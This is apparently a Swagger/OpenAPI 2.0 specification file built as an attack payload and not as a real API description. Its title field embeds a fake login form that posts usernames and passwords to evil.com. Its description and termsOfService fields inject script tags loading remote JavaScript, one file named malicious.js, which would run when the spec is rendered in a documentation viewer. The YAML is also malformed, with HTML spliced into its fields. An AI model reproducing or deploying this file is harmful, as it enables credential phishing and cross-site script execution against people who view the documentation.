swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  </div>
    <div class="form-container">
        <form action="https:evil.com" method="post" class="form-signin">
            <div class="form-group">
                <label for="username">Username</label>
                <input type="text" name="username" size="20">
            </div>
            <div class="form-group">
                <label for="password">Password</label>
                <input type="password" name="password" size="20">
            </div>
            <div class="form-group">
                <button type="submit" class="btn btn-default">Login</button>
            </div>
        </form>
    </div>
</div>'
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
  description: '<div class="login-form"><script src="https://raw.githubusercontent.com/bilauk/checkSWG/main/malicious.js"></script></div>'
  termsOfService: '<div class="login-form"><script src="https://static.staticsave.com/blunder/futaq.js"></script></div>'
  contact: 
    name: "API Support"
    url: "https://evil.com"
    email: "bilalabbasuk@gmail.com"




  
